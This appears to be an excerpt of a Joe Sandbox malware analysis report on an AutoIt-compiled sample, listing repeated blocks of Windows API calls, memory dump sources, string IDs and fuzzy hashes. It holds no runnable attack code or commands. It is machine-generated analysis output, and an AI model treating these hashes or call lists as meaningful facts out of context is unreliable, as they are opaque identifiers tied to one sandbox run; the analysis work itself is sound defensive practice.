
                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00593205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00593236
                                                                                                • Part of subcall function 00593205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0059323E
                                                                                                • Part of subcall function 00593205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00593249
                                                                                                • Part of subcall function 00593205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00593254
                                                                                                • Part of subcall function 00593205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0059325C
                                                                                                • Part of subcall function 00593205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00593264
                                                                                                • Part of subcall function 0059318C: RegisterWindowMessageW.USER32(00000004,?,00592906), ref: 005931E4
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005929AC
                                                                                              • OleInitialize.OLE32 ref: 005929CA
                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 005D39E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID: (&f$0$f$@(f$$f
                                                                                              • API String ID: 1986988660-3826714810
                                                                                              • Opcode ID: e4c44949d7e938fb6341371488d1d8069d94c34433b68b3f77ef0f54a8d01e3b
                                                                                              • Instruction ID: a6676733eefd7864499fc371fcdd557728c7ab87dd8a903bf2f87738fa706daa
                                                                                              • Opcode Fuzzy Hash: e4c44949d7e938fb6341371488d1d8069d94c34433b68b3f77ef0f54a8d01e3b
                                                                                              • Instruction Fuzzy Hash: 74717CB0911A438FD7A8DF7AED796153EE3BB88344710A12EE01AC72B1EBB05485CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00593568
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00593589
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 0059359D
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 005935A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: b1c664bc2bf5db59bb390f3dedb65ea52fcf77bcd234753b3b29ae1591ea6b63
                                                                                              • Instruction ID: b85d9afebb36daf54f028ef8133d51c07c75e9865e95d3d8cad4703ed39b6405
                                                                                              • Opcode Fuzzy Hash: b1c664bc2bf5db59bb390f3dedb65ea52fcf77bcd234753b3b29ae1591ea6b63
                                                                                              • Instruction Fuzzy Hash: EBF03A706006967AEB310B17AC18E372FBFD7C6F50B10101EF904B72A0C2A90841DAB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005955EB,SwapMouseButtons,00000004,?), ref: 0059561C
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005955EB,SwapMouseButtons,00000004,?), ref: 0059563D
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005955EB,SwapMouseButtons,00000004,?), ref: 0059565F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: 6942ac0ddf0805811ddaa3a7002bb69db4647bac06da4693d464a10641155e4d
                                                                                              • Instruction ID: df850c850b3e811f23765fd4c05ae8d995cb49f568f1cec448644af27a40ab31
                                                                                              • Opcode Fuzzy Hash: 6942ac0ddf0805811ddaa3a7002bb69db4647bac06da4693d464a10641155e4d
                                                                                              • Instruction Fuzzy Hash: E21157B1611A08BFDF228F64CC84EAEBBB8FF00748B544469A805D7120E671AE559B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,0062DC30), ref: 005FDABB
                                                                                              • GetLastError.KERNEL32 ref: 005FDACA
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 005FDAD9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0062DC30), ref: 005FDB36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2267087916-0
                                                                                              • Opcode ID: fba279d659f22ad7635abe960aed25b40b8bff4d93dd3e113f60e7da6b3a5409
                                                                                              • Instruction ID: 3cf0f17d638b9baa53c7f092d52bdb5912a789e34527859cceedd687528f9463
                                                                                              • Opcode Fuzzy Hash: fba279d659f22ad7635abe960aed25b40b8bff4d93dd3e113f60e7da6b3a5409
                                                                                              • Instruction Fuzzy Hash: 902191305092099F8710DF24D8859BBBBF9FE96364F144A1DF599832A1D734D90ACF52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 005D4115
                                                                                                • Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E
                                                                                                • Part of subcall function 005939DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005939FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                              • String ID: X$`ue
                                                                                              • API String ID: 779396738-3327563834
                                                                                              • Opcode ID: 58ccc3fc299edcb9a0a16878e6ec91097e4ab44e3ec5a18e90f07784c3b16b30
                                                                                              • Instruction ID: 275baa89034a41da1a704f31fdaa0ff3bdeece7d3c752338ab0894329a144a4b
                                                                                              • Opcode Fuzzy Hash: 58ccc3fc299edcb9a0a16878e6ec91097e4ab44e3ec5a18e90f07784c3b16b30
                                                                                              • Instruction Fuzzy Hash: 82219671A042599BCF11DF98D8497EE7FFDAF85305F00401AE505A7341DBF45A898FA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 005B09F8
                                                                                                • Part of subcall function 005B3634: RaiseException.KERNEL32(?,?,?,005B0A1A,?,00000000,?,?,?,?,?,?,005B0A1A,00000000,00659758,00000000), ref: 005B3694
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 005B0A15
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                              • String ID: Unknown exception
                                                                                              • API String ID: 3476068407-410509341
                                                                                              • Opcode ID: 4c03d030dfd0a0abe1d2826f5db3e1f4d8ff9fced011ed862bb04d3b39242166
                                                                                              • Instruction ID: 43cbc5ae260b91d6cdd3e0e21e96e87dc60a99661bf26faf3370e423cb23b836
                                                                                              • Opcode Fuzzy Hash: 4c03d030dfd0a0abe1d2826f5db3e1f4d8ff9fced011ed862bb04d3b39242166
                                                                                              • Instruction Fuzzy Hash: 6DF0623490030EB79B04BAA8DC5A9EFBF6C7E40350B605525BD24964E2EB71FA5AC5D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00618C52
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00618C59
                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00618E3A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 146820519-0
                                                                                              • Opcode ID: 28efb0ff7808e0980541db16f044a64c8aa26e1d80e6ae97253a882905f2c382
                                                                                              • Instruction ID: 405539252f804665a688896bfe9b0359000a5a36a45b9d5abf38da3662d14af5
                                                                                              • Opcode Fuzzy Hash: 28efb0ff7808e0980541db16f044a64c8aa26e1d80e6ae97253a882905f2c382
                                                                                              • Instruction Fuzzy Hash: 93125E719083419FD714CF24C494BAABBE6FF85314F18895DE8898B392DB30E985CF92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00596CA1
                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00596CB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: a35dddd7c2078112a399705e0dead1c695f550a77a8d375be2586bd276614243
                                                                                              • Instruction ID: 37e21ec1d07a8ec85dcd311cb74cfb40d5b7d37a39f743d704f901df0585b97f
                                                                                              • Opcode Fuzzy Hash: a35dddd7c2078112a399705e0dead1c695f550a77a8d375be2586bd276614243
                                                                                              • Instruction Fuzzy Hash: 59311971A0060AEFDF14CF68C980B99BBB5FB44714F14862AF915A7240D771BE98DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00595F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00596049
                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 005AFD44
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005AFD53
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005EFDD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_Timer$Kill
                                                                                              • String ID:
                                                                                              • API String ID: 3500052701-0
                                                                                              • Opcode ID: 3e4976923ed2149d35612c337cabfaaee7703dccbe971cb03c2868fea0e9c089
                                                                                              • Instruction ID: 5d63e764d7b2bd37ee11c8bf1c8562c67a94aea3f06dee1efacb1caed0183c1d
                                                                                              • Opcode Fuzzy Hash: 3e4976923ed2149d35612c337cabfaaee7703dccbe971cb03c2868fea0e9c089
                                                                                              • Instruction Fuzzy Hash: EC31C571904784AFEB32CF258C95BE6BFECBB02308F1004AED5D957241C7745A85CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,005C895C,?,00659CE8,0000000C), ref: 005C8A94
                                                                                              • GetLastError.KERNEL32(?,005C895C,?,00659CE8,0000000C), ref: 005C8A9E
                                                                                              • __dosmaperr.LIBCMT ref: 005C8AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 490808831-0
                                                                                              • Opcode ID: 961addea087371542037df269ebb4eea93045e138ca43b27cd76a9027cf7469f
                                                                                              • Instruction ID: 22b047ec5d4674b651e5a0f232bf1494029cf5d6b7c8e10456a4193cdf8ae27b
                                                                                              • Opcode Fuzzy Hash: 961addea087371542037df269ebb4eea93045e138ca43b27cd76a9027cf7469f
                                                                                              • Instruction Fuzzy Hash: 9E0108326059605ED72463F49C89F7E6F8ABBC2774F29061FE8189B1D2EE709CC59290
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,005C97CA,FF8BC369,00000000,00000002,00000000), ref: 005C9754
                                                                                              • GetLastError.KERNEL32(?,005C97CA,FF8BC369,00000000,00000002,00000000,?,005C5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,005B6F61), ref: 005C975E
                                                                                              • __dosmaperr.LIBCMT ref: 005C9765
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 2336955059-0
                                                                                              • Opcode ID: 323b7213c381dbc057beedc6c3df426085961a3c8487aee6cb2c2ccea58dec6d
                                                                                              • Instruction ID: bd3ee8074a05ec738ba54a937d45aa944a649f1053608dbc518334e4bdc75ade
                                                                                              • Opcode Fuzzy Hash: 323b7213c381dbc057beedc6c3df426085961a3c8487aee6cb2c2ccea58dec6d
                                                                                              • Instruction Fuzzy Hash: E7012832621515AFCB059FD9DC0DDAE3F6AFB86330B24020DF8108B190EA70AD519BD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 005A2FB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: CALL
                                                                                              • API String ID: 1385522511-4196123274
                                                                                              • Opcode ID: e32103f5ff0905736174356f93e0e120985369c13887171404aee744d13eba23
                                                                                              • Instruction ID: 624f3716c4365e1d5728c75a49e6fb1bf8c070fd4381f140f7c05be45e9ade4a
                                                                                              • Opcode Fuzzy Hash: e32103f5ff0905736174356f93e0e120985369c13887171404aee744d13eba23
                                                                                              • Instruction Fuzzy Hash: 5E228A706082429FC718DF18C885A2EBFF6BF8A314F14895DF4968B3A2D771E945CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005933E9,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00594227
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePath_wcslen
                                                                                              • String ID: $f
                                                                                              • API String ID: 4019309064-2970136919
                                                                                              • Opcode ID: 0ab41117390b85d88b36113554c2f0928cdcd88b85ef13e488db46220d73d84d
                                                                                              • Instruction ID: fc60b8d4d0ff1145cb0025198f9acc3a9bdb5f832b8df587594e21d9b9bf3db4
                                                                                              • Opcode Fuzzy Hash: 0ab41117390b85d88b36113554c2f0928cdcd88b85ef13e488db46220d73d84d
                                                                                              • Instruction Fuzzy Hash: 2611A13560060A9B8F11EBA4D805EDD7FEDBF89354F000066B589D3281EE74AB859F51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00609665
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00609673
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                              • String ID:
                                                                                              • API String ID: 3876400906-0
                                                                                              • Opcode ID: 8717cbccd6ca55ddce63c6eade253b8f55399bca058c7eda6fc7cabe256439b6
                                                                                              • Instruction ID: de54c04079f3da9c407051ea73f49eadae4d1cab150be45266a5f37be129650b
                                                                                              • Opcode Fuzzy Hash: 8717cbccd6ca55ddce63c6eade253b8f55399bca058c7eda6fc7cabe256439b6
                                                                                              • Instruction Fuzzy Hash: 22111C79600A169FDF10EB64C855D6FBBBAFF89360B058444E856AB361CB30FD01CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00593B33,?,00008000), ref: 00596E80
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00593B33,?,00008000), ref: 005D59A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 6376a6578ee60a1ab59c6a044ca1c72a55cd80a4967249f6ea434b85f73c2538
                                                                                              • Instruction ID: c12b72bd156c6549ab9e61e26ceabad3fc027cc496cc347a9657553c7268e968
                                                                                              • Opcode Fuzzy Hash: 6376a6578ee60a1ab59c6a044ca1c72a55cd80a4967249f6ea434b85f73c2538
                                                                                              • Instruction Fuzzy Hash: F2017131245225BAE7341A2ACC0EF977F99FF067B4F148311BE99AA1E0C7B45859CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 005932C4
